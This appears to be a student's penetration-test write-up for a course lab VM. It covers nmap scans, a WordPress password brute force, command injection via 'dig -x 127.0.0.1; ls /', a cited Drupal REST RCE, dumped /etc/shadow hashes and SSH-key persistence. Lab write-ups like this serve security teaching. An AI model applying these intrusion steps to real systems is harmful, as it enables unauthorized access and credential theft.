COMP7904 Assignment2 Write-up

Recon

172.16.218.144

Port

$ nmap 172.16.218.134/24 -sn 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-04 17:24 HKT
Nmap scan report for 172.16.218.1
Host is up (0.00064s latency).
Nmap scan report for 172.16.218.2
Host is up (0.00056s latency).
Nmap scan report for 172.16.218.134
Host is up (0.00053s latency).
Nmap scan report for 172.16.218.144
Host is up (0.020s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.63 seconds

Services:

• 21, ftp, vsftpd 3.0.3
• 22, ssh
• 80, 443, 7904, 7905, apache http

$ PORT=$(sudo nmap -sT --min-rate 10000 -p- $IP -oA nmap/ports | \
grep -E '^[0-9]+/tcp.*(open|filtered)' | awk -F '/' '{print $1}' | paste -sd ',') && \
sudo nmap -sT -sV -sC -O -p $PORT $IP -oA nmap/detail && \
sudo nmap --script=vuln -p $PORT $IP -oA nmap/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-04 17:27 HKT
Nmap scan report for 172.16.218.144
Host is up (0.00078s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
|_ftp-anon: got code 500 "OOPS: vsftpd: refusing to run with writable root inside chroot()".
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 cf:09:6e:d5:e8:bc:57:98:f8:14:71:c9:ec:20:e1:6a (RSA)
|   256 d8:0e:d8:92:8b:89:38:5e:15:44:cc:3d:f8:e8:10:84 (ECDSA)
|_  256 f4:a1:d6:73:46:d1:d1:5f:2f:83:fe:43:e2:14:3a:38 (ED25519)
80/tcp   open  http    Apache httpd
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache
| http-robots.txt: 1 disallowed entry 
|_/mysecret/
443/tcp  open  http    Apache httpd
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry 
|_/mysecret/
|_http-server-header: Apache
7904/tcp open  http    Apache httpd
|_http-title: HKU COMP7904 EXAM – Just another WordPress site
|_http-generator: WordPress 5.4
|_http-server-header: Apache
7905/tcp open  http    Apache httpd
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-title: Home | Umami Food Magazine
|_http-server-header: Apache
|_http-generator: Drupal 8 (https://www.drupal.org)
MAC Address: 00:0C:29:2E:13:FE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

$ sudo nmap -sU --top-ports 20 $IP -oA nmap/udp
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-04 17:29 HKT
Nmap scan report for 172.16.218.144
Host is up (0.00072s latency).

PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   open|filtered route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  open|filtered nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:2E:13:FE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.52 seconds

FTP

• Based on credential found inside 80 port, http, /mysecret directory. Here

• Login ftp and download file
  

• Identify file type and check its content
  

• ASCII file content: password of blog -> try it on both sites
  

80, http

80, http, Apache

phpmyadmin

phpinfo.php

mysecret

$ curl http://172.16.218.144/robots.txt                                                                             
User-agent: *
Disallow: /mysecret/

Default password: password

7904, WordPress

$ wpscan --url http://172.16.218.144:7904 --enumerate vp,vt,u,tt

Usernames:

• comp7904
• bart
• jerry

WordPress: 5.4.15

WordPress lore: 2.4.0

7905, Drupal

• http://172.16.218.144:7905/robots
• http://172.16.218.144:7905/user/password
• http://172.16.218.144:7905/user/register

Username: umami

Enumerate Drupal site: $ python cmseek.py -u http://172.16.218.144:7905/ -i drupal

Tool: Tuhinshubhra/CMSeeK

Vuln Analysis

Brute Force: WordPress Login

• Usernames obtained

comp7904
bart
jerry

• Brute force using wpscan: $ wpscan --url http://172.16.218.144:7904 -t 128 --enumerate ap,at,u,tt -U users -P /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt

[!] Valid Combinations Found:
 | Username: jerry, Password: qwerty

=> jerry / qwerty

WordPress: Theme Editor

• Through theme editor & username: jerry,bart -> permission not enough

WordPress: Activity monitor, Cmd Injection

Lookup Function: dig -x 127.0.0.1

Command Injection: dig -x 127.0.0.1; ls / => RCE

Drupal 8: Rest Module RCE

References:

• NVD - CVE-2019-6340 (nist.gov)

• Drupal < 8.6.9 - REST Module Remote Code Execution

POC: ping back

Foothold

WordPress: bart & cmd injection

Drupal 8 RCE

Privilege Escalation

Enum

DB Credential:

Scheduled task:

Scheduled Task: RCE Script

root@hku-comp7904-exam:~/.ssh# cat /etc/shadow | grep -E 'root|comp7904|bart|jerry'
root:*:18295:0:99999:7:::
comp7904:$6$BudMZHKHPtIDSxEB$3aXyRYMLyFxMX8aNH6ntOslkCAdIjLRoikKbRjPJzzeGZWm8kTN5piE1KecJw4LquuLzPfz.m4TGCt6ZXSFda0:18373:0:99999:7:::
bart:$6$2bvXNX9/$5ceH9KGHaJw3xE55qpbA2iQg5oJVJJR07e860/lnXn6KpGFeBEhi1/zbUpoNkztLv8N3sleOOi9aApDi2hEie1:18374:0:99999:7:::
jerry:$6$Dvul5tr1$ub9Rzwa5GcMqpvOSM7C7Qq.CTFl/CgroQwSQKSJ9LZYI8ZJyS58k2h6KxCuTkouX2EqUAdSZqeES9zM0eCWcF.:18374:0:99999:7:::

Maintain Access by ssh

House Cleaning

• /root/.ssh/authorized_keys